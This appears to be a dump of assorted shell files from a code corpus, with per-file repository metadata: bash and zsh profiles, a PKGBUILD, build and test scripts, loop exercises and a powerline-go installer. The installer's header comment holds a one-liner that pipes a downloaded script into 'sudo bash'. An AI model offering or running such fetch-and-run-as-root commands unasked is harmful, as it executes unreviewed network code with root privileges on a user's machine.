# * ~/.path can be used to extend `$PATH`.
# * ~/.extra can be used for other settings you don’t want to commit.
for file in ~/.{path,bash_prompt,exports,aliases,functions,extra}; do
[ -r "$file" ] && [ -f "$file" ] && source "$file";
done;
unset file;
# Case-insensitive globbing (used in pathname expansion)
shopt -s nocaseglob;
# Append to the Bash history file, rather than overwriting it
shopt -s histappend;
# Autocorrect typos in path names when using `cd`
shopt -s cdspell;
# Enable some Bash 4 features when possible:
# * `autocd`, e.g. `**/qux` will enter `./foo/bar/baz/qux`
# * Recursive globbing, e.g. `echo **/*.txt`
for option in autocd globstar; do
shopt -s "$option" 2> /dev/null;
done;
# Add tab completion for many Bash commands
if which brew &> /dev/null && [ -r "$(brew --prefix)/etc/profile.d/bash_completion.sh" ]; then
# Ensure existing Homebrew v1 completions continue to work
export BASH_COMPLETION_COMPAT_DIR="$(brew --prefix)/etc/bash_completion.d";
source "$(brew --prefix)/etc/profile.d/bash_completion.sh";
elif [ -f /etc/bash_completion ]; then
source /etc/bash_completion;
fi;
# Enable tab completion for `g` by marking it as an alias for `git`
if type _git &> /dev/null; then
complete -o default -o nospace -F _git g;
fi;
# Add tab completion for SSH hostnames based on ~/.ssh/config, ignoring wildcards
[ -e "$HOME/.ssh/config" ] && complete -o "default" -o "nospace" -W "$(grep "^Host" ~/.ssh/config | grep -v "[?*]" | cut -d " " -f2- | tr ' ' '\n')" scp sftp ssh;
# Add tab completion for `defaults read|write NSGlobalDomain`
# You could just use `-g` instead, but I like being explicit
complete -W "NSGlobalDomain" defaults;
# Add `killall` tab completion for common apps
complete -o "nospace" -W "Contacts Calendar Dock Finder Mail Safari iTunes SystemUIServer Terminal Twitter" killall;
# Python environment for Mac
#VIRTUALENVWRAPPER_PYTHON=/usr/local/bin/python3;
#export WORKON_HOME=$HOME/.virtualenvs;
#export PROJECT_HOME=$HOME/dev;
#source /usr/local/bin/virtualenvwrapper.sh;
# Mac OS change max open files limit (first 4 lines are one-time)
# echo kern.maxfiles=65536 | sudo tee -a /etc/sysctl.conf
# echo kern.maxfilesperproc=65536 | sudo tee -a /etc/sysctl.conf
# sudo sysctl -w kern.maxfiles=65536
# sudo sysctl -w kern.maxfilesperproc=65536
ulimit -n 65536 65536;
# Increase Node.js threadpool size
export UV_THREADPOOL_SIZE=1024
# Go lang
export GOPATH=$HOME/dev/go
# Brew specific stuff
export PATH="/opt/homebrew/bin:$PATH"
eval "$(/opt/homebrew/bin/brew shellenv)"
# Bigbank specific stuff
export NODE_EXTRA_CA_CERTS="/Users/olger.oeselg/Projects/certs/Bigbank_AS_Root_CA_2016.crt";
export NVM_DIR="$HOME/.nvm"
source $(brew --prefix nvm)/nvm.sh
# Add gettext to path
export PATH="/usr/local/opt/libiconv/bin:$PATH"
export LDFLAGS="-L/usr/local/opt/libiconv/lib"
export CPPFLAGS="-I/usr/local/opt/libiconv/include"
# Set language to US English
export LC_ALL=en_US.UTF-8
export LC_CTYPE=en_US.UTF-8
# Android Studio stuff
export PATH="${HOME}/Library/Android/sdk/tools:${HOME}/Library/Android/sdk/platform-tools:${PATH}"
# Bun.js (bun.sh)
export BUN_INSTALL="$HOME/.bun"
export PATH="$BUN_INSTALL/bin:$PATH"
# Java
# Fix: a stray "' >> /Users/olger.oeselg/.bash_profile" tail (left over from
# a pasted installer one-liner) opened an unterminated single quote that
# broke parsing of every line below it.
export PATH="/opt/homebrew/opt/openjdk/bin:$PATH"
export CPPFLAGS="-I/opt/homebrew/opt/openjdk/include"
# Fix: the old value used $( /Library/.../openjdk.jdk ), which tries to
# *execute* the JDK bundle directory (command substitution) and leaves
# JAVA_HOME empty. Point at the bundle's home directory instead.
export JAVA_HOME="/Library/Java/JavaVirtualMachines/openjdk.jdk/Contents/Home"
| true
|
3a4120852dba4f316fdc5af7e6dc2eb40ea5187e
|
Shell
|
OyugoObonyo/alx-system_engineering-devops
|
/0x04-loops_conditions_and_parsing/3-until_holberton_school
|
UTF-8
| 151
| 3.328125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Print "Holberton School" ten times, driven by an until loop.
i=0
until (( i == 10 ))
do
    printf '%s\n' "Holberton School"
    i=$(( i + 1 ))
done
| true
|
9778bf5cde6f208842e33616f7fdabf3c29e9970
|
Shell
|
StreakyCobra/aur-python-keras-git
|
/PKGBUILD
|
UTF-8
| 1,675
| 2.640625
| 3
|
[] |
no_license
|
# Maintainer: Fabien Dubosson <fabien.dubosson@gmail.com>
# PKGBUILD building Python 2 and Python 3 Keras packages from git HEAD.
pkgbase="python-keras-git"
pkgname=("python-keras-git" "python2-keras-git")
_pkgname="keras"
pkgver=1.2.0.r106.ge54d7951
pkgrel=1
pkgdesc="Deep Learning library (convnets, recurrent neural networks, and more)"
arch=('i686' 'x86_64')
url="https://github.com/fchollet/keras"
license=('MIT')
makedepends=('git'
'python' 'python-setuptools'
'python2' 'python2-setuptools'
)
changelog="ChangeLog"
source=("${_pkgname}::git+http://github.com/fchollet/${_pkgname}.git")
sha256sums=('SKIP')
# Derive the VCS package version from the latest tag + commit count + hash.
pkgver() {
cd "$_pkgname"
git describe --long --tags | sed 's/\([^-]*-g\)/r\1/;s/-/./g'
}
# Duplicate the checkout for Python 2 and rewrite its shebangs to python2.
prepare() {
cd "$srcdir/"
cp -a "${_pkgname}" "${_pkgname}-py2"
cd "${_pkgname}"
sed -e "s|#![ ]*/usr/bin/python$|#!/usr/bin/python2|" \
-e "s|#![ ]*/usr/bin/env python$|#!/usr/bin/env python2|" \
-e "s|#![ ]*/bin/env python$|#!/usr/bin/env python2|" \
-i $(find . -name '*.py')
}
# Build both variants with their respective interpreters.
build() {
msg "Building Python 2"
cd "$srcdir/${_pkgname}-py2"
python2 setup.py build
msg "Building Python 3"
cd "$srcdir/${_pkgname}"
python setup.py build
}
package_python2-keras-git() {
depends=('python2' 'python2-numpy' 'python2-scipy' 'python2-theano' 'python2-h5py')
provides=('python2-keras')
conflicts=('python2-keras')
cd "$srcdir/${_pkgname}-py2"
python2 setup.py install --root="$pkgdir"/ --optimize=1
}
package_python-keras-git() {
depends=('python' 'python-numpy' 'python-scipy' 'python-theano' 'python-h5py')
provides=('python-keras')
conflicts=('python-keras')
cd "$srcdir/${_pkgname}"
python setup.py install --root="$pkgdir"/ --optimize=1
}
# vim:set ts=2 sw=2 et:
| true
|
f966be0e7e8e3d780d3aaf54c63d5059749a6b53
|
Shell
|
rcelha/flask-desk
|
/scripts/build_image
|
UTF-8
| 273
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/sh
# Rebuild the flask-desk production Docker image from scratch.
set -ex;
image_name=rcelha/flask_desk_application
# NOTE(review): container_name is assigned but never used below -- confirm
# whether another script relies on it before removing.
container_name=rcelha_flask_desk_application_run
echo Build docker image;
# Stop the stack, remove the old app container, then rebuild the image.
docker-compose -f docker-compose.prod.yml stop
docker-compose -f docker-compose.prod.yml rm --force app
docker build -t ${image_name} .
| true
|
9bc0de9a2d83ba3c8b03bc9a41fe4f32ac6dbaff
|
Shell
|
suDisdain/dotfiles
|
/.local/bin/shortcuts
|
UTF-8
| 446
| 3.359375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Generate shell alias shortcuts from the user's `files` list.
# Output locations. Unactivated progs should go to /dev/null.
shell_shortcuts="${XDG_CONFIG_HOME:-$HOME/.config}/shortcutrc"
# Remove, prepare files
printf "# vim: filetype=sh\\nalias " > "$shell_shortcuts"
# Format the `files` file in the correct syntax and sent it to both configs.
# sed strips comments and blank lines; awk rewrites each "name path" pair as
# an alias opening the path in $EDITOR, appended to shortcutrc via tee's
# process substitution (the stripped list also goes to stdout).
sed "s/\s*#.*$//;/^\s*$/d" "${XDG_CONFIG_HOME:-$HOME/.config}/files" | tee >(awk '{print $1"=\"$EDITOR "$2"\" \\"}' >> "$shell_shortcuts")
| true
|
9e03521cf28d1359ba1470ad464d2ac4b8d7db3c
|
Shell
|
uniquehash/C
|
/piscine/day12/ex00/tests/test5.sh
|
UTF-8
| 578
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/zsh
# Test 5 for ft_display_file: run the binary against a directory argument.
# Builds the project, copies the binary into a throw-away temp dir under a
# random name, and captures stdout/stderr alongside the expected outputs.
TMPDIRNAME=$(mktemp -d)
BINARYNAME=$RANDOM
trap "rm -rf $TMPDIRNAME" EXIT
cd ..
make all || exit 1
cp ft_display_file $TMPDIRNAME/$BINARYNAME
cd $TMPDIRNAME
YELLOW=$(printf "\e[33;1m")
GREEN=$(printf "\e[32;1m")
RED=$(printf "\e[31;1m")
RESET=$(printf "\e[m")
mkdir dir
printf "" > input
printf "" > expect.out
printf "Too many arguments.\n" > expect.err
CMD="./$BINARYNAME dir"
echo $CMD
echo ${YELLOW}Test:${RESET} Program terminates when faced with error
trap "echo ${RED}Diff [KO]$RESET" INT
$CMD >user.out 2>user.err <input
# NOTE(review): no diff of user.out/user.err against expect.out/expect.err is
# actually performed here -- [OK] is printed unconditionally; confirm whether
# a diff step is missing.
echo "${GREEN}Check [OK]$RESET"
| true
|
cdbcc97e3d6ae3605d033539b827a0f53c820b0e
|
Shell
|
mattrayner/Notes
|
/backups/.bash_profile
|
UTF-8
| 1,748
| 2.75
| 3
|
[] |
no_license
|
# Interactive shell setup: aliases, prompt, RVM, and PATH additions.
alias ll="ls -lahG"
[[ -s "$HOME/.profile" ]] && source "$HOME/.profile" # Load the default .profile
[[ -s "$HOME/.bash_prompt" ]] && source "$HOME/.bash_prompt" # Load our custom bash prompt
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
[[ -s ~/.bashrc ]] && source ~/.bashrc
# NOTE(review): the three MacPorts installer blocks below each prepend the
# same directories to PATH (harmless but redundant) -- left as generated.
##
# Your previous /Users/matthew.rayner/.bash_profile file was backed up as /Users/matthew.rayner/.bash_profile.macports-saved_2014-01-15_at_14:28:47
##
# MacPorts Installer addition on 2014-01-15_at_14:28:47: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
##
# Your previous /Users/matt/.bash_profile file was backed up as /Users/matt/.bash_profile.macports-saved_2014-03-02_at_23:16:28
##
# MacPorts Installer addition on 2014-03-02_at_23:16:28: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
##
# Your previous /Users/matthewrayner/.bash_profile file was backed up as /Users/matthewrayner/.bash_profile.macports-saved_2014-03-20_at_17:23:21
##
# MacPorts Installer addition on 2014-03-20_at_17:23:21: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
# MySQL client tools and shared libraries.
MYSQL=/usr/local/mysql/bin
export PATH=$PATH:$MYSQL
export DYLD_LIBRARY_PATH=/usr/local/mysql/lib:$DYLD_LIBRARY_PATH
export JAVA_HOME='/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home'
export PATH=$PATH:$JAVA_HOME
| true
|
6701144a9fd4dbd8d9513e04e9649ba4be3d9b14
|
Shell
|
zichaotong/Computation_using_CPP
|
/vector_read/vector_read_prb.sh
|
UTF-8
| 599
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
#
g++ -c -g -I/$HOME/include vector_read_prb.cpp >& compiler.txt
if [ $? -ne 0 ]; then
echo "Errors compiling vector_read_prb.cpp"
exit
fi
rm compiler.txt
#
g++ vector_read_prb.o /$HOME/libcpp/$ARCH/vector_read.o -lm
if [ $? -ne 0 ]; then
echo "Errors linking and loading vector_read_prb.o."
exit
fi
#
rm vector_read_prb.o
#
mv a.out vector_read_prb
./vector_read_prb < vector_read_prb_input.txt > vector_read_prb_output.txt
if [ $? -ne 0 ]; then
echo "Errors running vector_read_prb."
exit
fi
rm vector_read_prb
#
echo "Program output written to vector_read_prb_output.txt"
| true
|
afeb86c1b772ce2213acdfd7b19752832e43f489
|
Shell
|
sayan2407/BridgeLabz-All-Program
|
/Day6_14.sh
|
UTF-8
| 250
| 3.34375
| 3
|
[] |
no_license
|
#! /usr/bin/bash -x
read -p "Enter N : " n
for (( i=2 ; i<=$n ;i++ ))
do
b=0
for (( j=2 ; j<=$(( i/2 )) ;j++ ))
do
if [ $(( i % j )) -eq 0 ]
then
b=1
break
fi
done
if [ $b -eq 0 ]
then
echo -n "$i "
fi
done
| true
|
b792891dbc62144826720050e402ba50d2743e17
|
Shell
|
gayoso/SistemasOperativos
|
/grupo09/Arrancar.sh
|
UTF-8
| 1,947
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
source AFRAINfunc.sh
ARRANCAR="Arrancar"
CALLER="$2"
cantParametros="$#"
function loguearErrorOEcho {
if [[ "$cantParametros" -eq 1 ]]; then
echo "[ERROR] $1"
else
logEchoError "$CALLER" "Arrancar.sh: $1"
fi
}
function loguearInfoOEcho {
if [[ "$cantParametros" -eq 1 ]]; then
echo "[INFO] $1"
else
logEchoInfo "$CALLER" "Arrancar.sh: $1"
fi
}
if [[ "$ENTORNO_CONFIGURADO" != true ]]; then
# No logueo porque no existen las variables de ambiente
echo "[ERROR] El entorno no ha sido configurado aún. Corra el script AFRAINIC.sh para configurarlo."
exit 1
fi
if [[ "$cantParametros" -ne 1 && "$cantParametros" -ne 2 ]]; then
loguearErrorOEcho "La cantidad de parametros recibida no es correcta."
exit 1
fi
script_name="$1"
if [[ "$script_name" != "AFRARECI.sh" ]] && [[ "$script_name" != "AFRAUMBR.sh" ]] && [[ "$script_name" != "AFRALIST.pl" ]]; then
loguearErrorOEcho "Este comando sirve para arrancar solo a AFRARECI.sh, AFRAUMBR.sh o AFRALIST.pl."
exit 1
fi
script_pid=$(pgrep "$script_name")
if [[ $(wc -w <<< "$script_pid") != 0 ]]; then
loguearErrorOEcho "El script indicado ($script_name) ya esta corriendo y no puede arrancarse nuevamente."
exit 1
fi
afralist_pid=$(ps -ef | grep "perl AFRALIST.pl" | grep -v "grep")
if [[ "$afralist_pid" != "" ]]; then
loguearErrorOEcho "El script indicado ($script_name) ya esta corriendo y no puede arrancarse nuevamente."
exit 1
fi
if [[ "$script_name" == "AFRARECI.sh" ]]; then
./"$script_name" &
afrareciPID=$(pgrep AFRARECI.sh)
loguearInfoOEcho "Arrancando el script 'AFRARECI.sh' bajo el PID: $afrareciPID"
exit 0
fi
if [[ "$script_name" == "AFRAUMBR.sh" ]]; then
./"$script_name" &
afraumbrPID=$(pgrep AFRAUMBR.sh)
loguearInfoOEcho "Arrancando el script 'AFRAUMBR.sh' bajo el PID: $afraumbrPID"
exit 0
fi
if [[ "$script_name" == "AFRALIST.pl" ]]; then
loguearInfoOEcho "Arrancando el script 'AFRALIST.pl'"
perl "$script_name"
exit 0
fi
| true
|
35cd8349d1d7575cf672d5e4aaae7ebd5b689dec
|
Shell
|
aheimsbakk/notes
|
/install-powerline-go.sh
|
UTF-8
| 1,741
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/sh
#
# Install or reinstall powerline in /etc/profile.d.
#
# wget -O - https://raw.githubusercontent.com/aheimsbakk/notes/master/install-powerline.sh | sudo bash
#
BASE_URL=https://raw.githubusercontent.com/aheimsbakk/notes/master
. /etc/os-release
rm -f /usr/local/bin/powerline-go
if [ "$(uname -m)" = "armv7l" ]; then
wget -q -nc -O /usr/local/bin/powerline-go https://github.com/justjanne/powerline-go/releases/download/v1.22.1/powerline-go-linux-arm
elif [ "$(uname -m)" = "aarch64" ]; then
wget -q -nc -O /usr/local/bin/powerline-go https://github.com/justjanne/powerline-go/releases/download/v1.22.1/powerline-go-linux-arm64
else
wget -q -nc -O /usr/local/bin/powerline-go https://github.com/justjanne/powerline-go/releases/download/v1.22.1/powerline-go-linux-amd64
fi
chmod +x /usr/local/bin/powerline-go
case "$ID" in
debian | raspbian | ubuntu)
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get -y install python3-pip git tmux vim-nox wget fonts-powerline
;;
fedora)
dnf -y install python3-pip git tmux vim wget
;;
rhel | centos)
yum -y install python3-pip git tmux vim wget
;;
*)
echo Unknown OS.
exit 1
;;
esac
rm -f /etc/profile.d/powerline-zgo.sh /etc/profile.d/powerline-other.sh /etc/profile.d/z-powerline-go.sh /etc/profile.d/powerline.sh /etc/profile.d/zzz-powerline.sh
wget -q -nc -O /etc/profile.d/z-powerline-go.sh $BASE_URL/powerline-zgo.sh
wget -q -nc -O /etc/profile.d/powerline-other.sh $BASE_URL/powerline-other.sh
echo
echo "Log out and in again to activate powerline-go."
echo "Or source the configuration in the current shell:"
echo
echo " source /etc/profile.d/powerline-other.sh"
echo " source /etc/profile.d/z-powerline-go.sh"
echo
| true
|
3b95bb646cab55ceab23ecd825d1af6efa2f6681
|
Shell
|
AndreiGolovatskii/sportprog
|
/lksh2018&POST/2018-july-A-small-archive/courses/examples/array.sh
|
UTF-8
| 252
| 2.59375
| 3
|
[] |
no_license
|
sols[0]="solutions/forbidden_basic_ra"
scores[0]=10
sols[1]="solutions/forbidden_mp_greedy"
scores[1]=50
# $1, $2, .... $*
echo ${sols[1]}
echo We have ${#sols[*]} solutions,
echo scores = ${scores[*]}
# f=a b c d
# for solution in f ; do
# done
| true
|
d38a113d8d9eab4f467f482ca7e47105fc2f1805
|
Shell
|
millenito/dotfiles
|
/.zshrc
|
UTF-8
| 12,795
| 3.015625
| 3
|
[] |
no_license
|
# load zgen
source "${HOME}/.zgen/zgen.zsh"
# if the init scipt doesn't exist
if ! zgen saved; then
echo "Creating a zgen save"
zgen oh-my-zsh
# plugins
zgen oh-my-zsh plugins/git
zgen oh-my-zsh plugins/command-not-found
zgen oh-my-zsh plugins/vi-mode
zgen oh-my-zsh plugins/colored-man-pages
# zgen load zpm-zsh/colors
zgen load zdharma/fast-syntax-highlighting
zgen load zsh-users/zsh-autosuggestions
# bulk load
# zgen loadall <<EOPLUGINS
# zsh-users/zsh-history-substring-search
# /path/to/local/plugin
# EOPLUGINS
# ^ can't indent this EOPLUGINS
# completions
zgen load zsh-users/zsh-completions src
zgen load docker/cli contrib/completion/zsh
# theme
# zgen oh-my-zsh themes/avit
# zgen oh-my-zsh themes/steeef
# zgen oh-my-zsh themes/ys
# zgen load marszall87/nodeys-zsh-theme nodeys
zgen load denysdovhan/spaceship-prompt spaceship
zgen load mafredri/zsh-async
# zgen load sindresorhus/pure
# zgen load geometry-zsh/geometry
# save all to init script
zgen save
fi
ZGEN_RESET_ON_CHANGE=(${HOME}/.zshrc ${HOME}/.zshrc.local)
set -o ignoreeof # xfce terminal
setopt auto_list # automatically list choices on ambiguous completion
setopt auto_menu # automatically use menu completion
setopt always_to_end # move cursor to end if word had one match
setopt hist_ignore_all_dups # remove older duplicate entries from history
setopt hist_reduce_blanks # remove superfluous blanks from history items
setopt share_history # share history between different instances
setopt correct_all # autocorrect commands
# auto ls after cd with exa
autoload -U add-zsh-hook
autoload -U colors && colors
add-zsh-hook -Uz chpwd (){
# if type exa > /dev/null 2>&1; then
# exa --group-directories-first
# exa
if type lsd > /dev/null 2>&1; then
lsd --group-dirs first
else
ls
fi
}
# Enable autocompletions
autoload -Uz compinit
typeset -i updated_at=$(date +'%j' -r ~/.zcompdump 2>/dev/null || stat -f '%Sm' -t '%j' ~/.zcompdump 2>/dev/null)
if [ $(date +'%j') != $updated_at ]; then
compinit -i
else
compinit -C -i
fi
zmodload -i zsh/complist
# Save history so we get auto suggestions
HISTFILE=$HOME/.zsh_history
HISTSIZE=100000
SAVEHIST=$HISTSIZE
# use the vi navigation keys in menu completion
zstyle ':completion:*' menu select
zmodload zsh/complist
bindkey -M menuselect 'h' vi-backward-char
bindkey -M menuselect 'k' vi-up-line-or-history
bindkey -M menuselect 'l' vi-forward-char
bindkey -M menuselect 'j' vi-down-line-or-history
# vi mode zsh
bindkey -v
# GNU Readline bindings
bindkey "\C-u" vi-kill-line
bindkey "\C-k" vi-kill-eol
bindkey "\C-f" vi-forward-char
bindkey "\C-b" vi-backward-char
bindkey "^[f" vi-forward-word
bindkey "^[b" vi-backward-word
bindkey '^[[Z' undo # Shift+tab undo last action
# 10ms for key sequences
KEYTIMEOUT=1
export ZSH_AUTOSUGGEST_BUFFER_MAX_SIZE=20
export ZSH_AUTOSUGGEST_USE_ASYNC=1
# Spaceship prompt
SPACESHIP_GIT_LAST_COMMIT_SHOW="${SPACESHIP_GIT_LAST_COMMIT_SHOW=true}"
SPACESHIP_GIT_LAST_COMMIT_SYMBOL="${SPACESHIP_GIT_LAST_COMMIT_SYMBOL=""}"
SPACESHIP_GIT_LAST_COMMIT_PREFIX="${SPACESHIP_GIT_LAST_COMMIT_PREFIX=""}"
SPACESHIP_GIT_LAST_COMMIT_SUFFIX="${SPACESHIP_GIT_LAST_COMMIT_SUFFIX=""}"
SPACESHIP_GIT_LAST_COMMIT_COLOR="${SPACESHIP_GIT_LAST_COMMIT_COLOR="magenta"}"
spaceship_git_last_commit() {
[[ $SPACESHIP_GIT_LAST_COMMIT_SHOW == false ]] && return
spaceship::is_git || return
local 'git_last_commit_status'
# git_last_commit_status=$(git log --pretty='format:%<(25,trunc)%s 🕑 %cr' 'HEAD^..HEAD' | head -n 1)
# git_last_commit_status=$(git log --pretty='format:🕑 %cr %s' | head -n 1)
git_last_commit_status=$(git log --pretty='format:🕑 %cr | %<(30,trunc)%s' | head -n 1)
[[ -z $git_last_commit_status ]] && return
spaceship::section \
"$SPACESHIP_GIT_LAST_COMMIT_COLOR" \
"$SPACESHIP_GIT_LAST_COMMIT_PREFIX" \
"$SPACESHIP_GIT_LAST_COMMIT_SYMBOL$git_last_commit_status" \
"$SPACESHIP_GIT_LAST_COMMIT_SUFFIX"
}
SPACESHIP_PROMPT_ORDER=(
# time # Time stamps section
host # Hostname section
user # Username section
dir # Current directory section
docker # Docker section
# php # PHP section
git # Git section (git_branch + git_status)
git_last_commit
line_sep # Line break
battery # Battery level and status
jobs # Background jobs indicator
exit_code # Exit code section
exec_time # Execution time
char # Prompt character
)
SPACESHIP_RPROMPT_ORDER=( # Spaceship right prompt
vi_mode # Vi-mode indicator
)
SPACESHIP_CHAR_SYMBOL="❯"
SPACESHIP_CHAR_SUFFIX=" "
SPACESHIP_USER_COLOR="red"
SPACESHIP_USER_SHOW=always
SPACESHIP_HOST_SHOW=always
SPACESHIP_HOST_SHOW_FULL=true
SPACESHIP_HOST_COLOR="cyan"
SPACESHIP_USER_PREFIX="as "
SPACESHIP_DIR_COLOR="yellow"
SPACESHIP_PROMPT_FIRST_PREFIX_SHOW=true
SPACESHIP_BATTERY_THRESHOLD=20
# SPACESHIP_HOST_PREFIX="using "
SPACESHIP_VI_MODE_INSERT="-- INSERT --"
SPACESHIP_VI_MODE_NORMAL="[NORMAL]"
# pure prompt
autoload -U promptinit; promptinit
# change the path color
zstyle :prompt:pure:path color yellow
# Untuk merubah titlebar dari st terminal
# Sumber: http://www.faqs.org/docs/Linux-mini/Xterm-Title.html#s5
case $TERM in
st*)
DISABLE_AUTO_TITLE="true"
precmd () {
# menampilkan direktori aktif (kondisi default)
print -Pn "\e]0;st: %~\a"
}
preexec () {
# menampilkan program yang sedang berjalan
print -Pn "\e]0;st:$1\a"
}
;;
*)
DISABLE_AUTO_TITLE="false" ;;
esac
# Random man page everytime a terminal opens
# man $(find /usr/share/man/man1 -type f | shuf | head -1) | head -25
# # Change cursor shape for different vi modes.
# function zle-keymap-select {
# if [[ ${KEYMAP} == vicmd ]] ||
# [[ $1 = 'block' ]]; then
# echo -ne '\e[1 q'
#
# elif [[ ${KEYMAP} == main ]] ||
# [[ ${KEYMAP} == viins ]] ||
# [[ ${KEYMAP} = '' ]] ||
# [[ $1 = 'beam' ]]; then
# echo -ne '\e[5 q'
# fi
# }
# zle -N zle-keymap-select
#
# # Use beam shape cursor on startup.
# echo -ne '\e[5 q'
#
# # Use beam shape cursor for each new prompt.
# zle-line-init() {
# zle -K viins # initiate `vi insert` as keymap (can be removed if `bindkey -V` has been set elsewhere)
# echo -ne "\e[5 q"
# }
alias pacman="sudo pacman"
alias s="ssh"
alias p="ping"
alias g="git"
alias trc="transmission-remote-cli"
alias lg="ls -l | grep"
alias lag="ls -al | grep"
# enable nvidia drivers
alias nvidia="sudo primusrun glxgears"
# startx from tty
alias sx="startx"
# nmcli wifi
alias nmlist="nmcli dev wifi list"
alias nmconn="nmcli dev wifi connect"
# set path go
#export GOROOT=/home/$USER/go/
#export GOPATH=/home/$USER/gopath/
#export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
# cd to environment
alias dot='cd "$DOTFILES"'
alias note='cd "$NOTES"'
alias kul='cd "$KULIAH"'
alias scr='cd "$SCRIPTS"'
alias qmk='cd "$QMK"'
alias qmk_make='make annepro2/c18; echo " Press LSHIFT + RSHIFT + B on Anne Pro 2 keyboard to enter IAP mode before flashing"'
alias qmk_flash="sudo ./annepro2_tools --boot annepro2_c18_millenito-annepro2-qmk.bin"
# Open ssh configs in editor
vssh(){
$EDITOR ~/.ssh/config
}
# localan php53 & php70
p5(){
cd "${P5}/$1"
}
p7(){
cd "${P7}/$1"
}
p8(){
cd "${P8}/$1"
}
njs(){
cd "${NJS}/$1"
}
compdef '_files -W $P5' p5
compdef '_files -W $P7' p7
compdef '_files -W $P8' p8
compdef '_files -W $NJS' njs
launchl(){
case "$(pwd)" in
*"$P5"*)
CURDIR=$(pwd | sed "s|"${P5}"||g")
[ ! $(docker ps | grep php53_apache) ] && docker start php53_apache
open -a "Google Chrome" "http://localhost:8085/${CURDIR}" >/dev/null 2>&1 & ;;
# $BROWSER "http://localhost:8085/${CURDIR}" >/dev/null 2>&1 & ;;
*"$P7"*)
CURDIR=$(pwd | sed "s|"${P7}"||g")
[ ! $(docker ps | grep php73_apache) ] && docker start php73_apache
open -a "Google Chrome" "http://localhost:8073/${CURDIR}" >/dev/null 2>&1 & ;;
# $BROWSER "http://localhost:8073/${CURDIR}" >/dev/null 2>&1 & ;;
# $BROWSER "http://localhost:8080/${CURDIR}" >/dev/null 2>&1 & ;;
esac
}
# start docker development server
alias ds5='docker start php53_apache'
alias ds7='docker start php73_apache'
# use neovim if available
if type nvim > /dev/null 2>&1; then
alias rvim='/usr/bin/vim' # real vim
alias v='nvim'
alias vi='nvim'
alias vim='nvim'
else
alias v='vim'
alias vi='vim'
fi
alias alacritty='WINIT_HIDPI_FACTOR=1.0 alacritty' # open alacritty normal size
if type exa > /dev/null 2>&1; then
alias ls='exa'
alias la='exa -a'
fi
alias cls='colorls'
# alias zaread='"$DOTFILES"/.i3/scripts/zaread' # read doc/docx/ppt/odf/ppt/pptx files with zathura (https://github.com/millenito/zaread)
# tmux
if type tmux > /dev/null 2>&1; then
alias tm='tmux'
alias tml='tmux ls'
tma(){ if [[ $# -eq 0 ]]; then tmux attach; else tmux attach -t "$1"; fi } # Attach to last tmux session or attach to named session
tmn(){ if [[ $# -eq 0 ]]; then tmux new-session; else tmux new-session -s "$1"; fi} # Create new unnamed session or use gived name
tmk(){ if [[ $# -eq 0 ]]; then tmux kill-server; else tmux kill-session -t "$1"; fi } # Kill all session or kill named session
fi
# fuzzy_cd_anywhere (cd kemanapun dengan fzf dengan parameter (ex: fcda anime))
function fcda() {
local file
file="$(locate -Ai -0 $@ | grep -z -vE '~$' | fzf --read0 -0 -1)"
if [[ -n $file ]]
then
if [[ -d $file ]]
then
cd -- $file | sed -e 's/[[:space:]]/\\ /g'
else
cd -- ${file:h}
fi
fi
}
# fuzzy_vim (Buka fzf dan otomatis buka file yg dipilih oleh fzf dengan vim)
fv() {
local files
IFS=$'\n' files=($(fzf-tmux --query="$1" --multi --select-1 --exit-0))
[[ -n "$files" ]] && ${EDITOR:-/usr/bin/vim} "${files[@]}"
}
# fuzzy_cd (buke fzf dan cd ke directory yang dipilih)
fcd() {
alias fzf_alt_c_command=$FZF_ALT_C_COMMAND
alias fzf_alt_c_opts=fzf $FZF_ALT_C_OPTS
local dir
dir="$( fzf_alt_c_command $@ | fzf_alt_c_opts)" || return
cd "$dir" || return
}
# git log with fzf and preview
fgl() {
local commits=$(
git log --graph --format="%C(yellow)%h%C(red)%d%C(reset) - %C(bold green)(%ar)%C(reset) %s %C(blue)<%an>%C(reset)" --color=always "$@" |
fzf --ansi --no-sort --height 100% \
--preview "echo {} | grep -o '[a-f0-9]\{7\}' | head -1 |
xargs -I@ sh -c 'git show --color=always @'"
)
if [[ -n $commits ]]; then
local hashes=$(printf "$commits" | cut -d' ' -f2 | tr '\n' ' ')
git show $hashes
fi
}
# Fuzzy script (cari script dengan fzf dan buka dengan editor)
fs() { du -aL $SCRIPTS "${PROJECTS}/learning/shell-script" | awk '{print $2}' | fzf | xargs -r $EDITOR ; }
# Fuzzy projects (cd ke folder projects2 dan buka session tmux baru bernama localhost)
fp()
{
if type fd > /dev/null 2>&1; then
cd $(fd --type d --follow --exclude '*.git*' . $PROJECTS | fzf)
else
cd $(find -L $PROJECTS -type d | fzf)
fi
[ -n $(type tmux > /dev/null 2>&1) ] && [ -z "$TMUX" ] && tmn projects
}
# # ex - archive extractor
# # usage: ex <file>
ex ()
{
NEWDIR=$(echo "$1" | sed 's/\.[^.]*$//')
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xvjf $1 -c $1 ;;
*.tar.gz) tar xzvf $1 -c $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar x $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xvf $1 -c $1 ;;
*.tbz2) tar xjf $1 -c $1 ;;
*.tgz) tar xvzf $1 -c $1 ;;
*.zip) mkdir "$NEWDIR" && unzip $1 -d "$NEWDIR" ;;
*.Z) uncompress $1;;
